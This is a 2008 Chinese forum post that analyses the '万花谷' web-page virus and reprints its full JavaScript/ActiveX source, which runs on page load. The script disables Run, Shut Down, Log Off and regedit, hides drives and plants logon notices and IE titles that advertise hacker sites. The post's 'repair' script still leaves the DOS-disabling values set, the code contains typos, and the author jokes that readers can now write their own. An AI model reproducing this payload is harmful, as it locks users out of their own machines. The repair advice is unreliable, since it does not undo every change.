我认为要想学好病毒,最好的途径就是分析病毒源码!最近听说毒木成林要招聘新的版主了,为了响应这一号召,小菜就拙笔分析一下万花谷病毒,如有不好的地方还请高手指教。
万花谷病毒发作时有如下几个特征:
(1)用户不能正常使用WINDOWS的DOS功能程序;
(2)用户不能正常退出WINDOWS,
(3)开始菜单上的"关闭系统"、"运行"等栏目被屏蔽,防止用户重新以DOS方式启动,关闭DOS命令、关闭REGEDIT命令等。
(4)将IE的浏览器的首页和收藏夹中都加入了含有该有害网页代码的网络地址。
具体的表现形式是:
a:网络地址是:
www.on888.xxx.xxx.com;
b:在IE的"收藏夹"中自动加上"万花谷"的快捷方式,网络地址是:"
http://96xx.xxx.com";
好了,那就让我们看看它是如何来实现这些特征的:
以下就是这个病毒的代码:
<SCRIPT language=JavaScript>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
<!--创建到收藏夹-->
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}
function f(){
try
{
<!--ActiveX初始化过程-->
ActiveX initialization
a1=document.applets[0];
a1.setCLSID("");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("");
a1.createInstance();
Net = a1.GetObject();
try
{
if (documents .cookies.indexOf("Chg") == -1)
{
<!--修改设置主页-->
//Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "
http://com.6to23.com/");
var expdate = new Date((new Date()).getTime() + (1));
documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
<!--改写注册表-->
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 01, "REG_BINARY");
//消除RUN按纽
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose", 01, "REG_BINARY");
//消除关闭按纽
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff", 01, "REG_BINARY");
//消除注销按纽
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives", "63000000", "REG_DWORD");
//隐藏盘符
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", "00000001", "REG_DWORD");
//禁止注册表
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled", "00000001", "REG_DWORD");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode", "00000001", "REG_DWORD");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "您的计算机已经被
http://www.cnhack.org/优化: )");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "您的计算机已经被
http://www.cnhack.org/优化: )");
//设置开机提示
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "新的标题★
http://com.6to23.com/ &
http://www.cnhack.org/");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "新的标题★
http://com.6to23.com/ &
http://www.cnhack.org/");
//设置IE标题
var expdate = new Date((new Date()).getTime() + (1));
documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
<!--实现打开页面后1秒钟内执行测试修改注册表的工作-->
init();</SCRIPT>
以下是利用一段类似的JavaScript代码修复各项的键值:
<SCRIPT language=JavaScript>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
<!--创建到收藏夹-->
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}
function f(){
try
{
<!--ActiveX初始化过程-->
ActiveX initialization
a1=document.applets[0];
a1.setCLSID("");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("");
a1.createInstance();
Net = a1.GetObject();
try
{
if (documents .cookies.indexOf("Chg") == -1)
{
<!--修改设置主页-->
//Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "
http://com.6to23.com/");
var expdate = new Date((new Date()).getTime() + (1));
documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
<!--改写注册表-->
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 00, "REG_BINARY");
//修复RUN按纽
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose", 00, "REG_BINARY");
//修复关闭按纽
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff", 00, "REG_BINARY");
//修复注销按纽
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives", "00000000", "REG_DWORD");
//取消隐藏盘符
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", "00000000", "REG_DWORD");
//取消禁止注册表
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled", "00000001", "REG_DWORD");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode", "00000001", "REG_DWORD");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "");
//重设开机提示
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Microsoft Internet Explorer");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Microsoft Internet Explorer");
//重设IE标题
var expdate = new Date((new Date()).getTime() + (1));
documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
<!--实现打开页面后1秒钟内执行测试修改注册表的工作-->
init();</SCRIPT>
注册表打开方法:开始/运行/regedit
其中Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "");
这个开机重设我们可以自己试试,引号里面的字我们可以随便加,这个就会在开机进入桌面前会弹出一个对话框,写有你设置的文字,单击确定或回车取消。不动则进不了桌面!
修改IE主页的方法是设置:
/Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://com.6to23.com/");
好了,当我们了解它的发病原理时,当再次遇到这种类似的情况就不会害怕了,自己也就可以解决了,所以说,要想学好病毒,要想了解病毒,要想成为杀毒专家,必须要分析病毒,其实现在你可以按照这个源码编写一个了,呵呵,开个玩笑啊。本源码仅供学习使用,请勿做非法用途,违者自负责任!
[
本帖最后由 夜虫儿 于 2008-9-16 21:58 编辑 ]
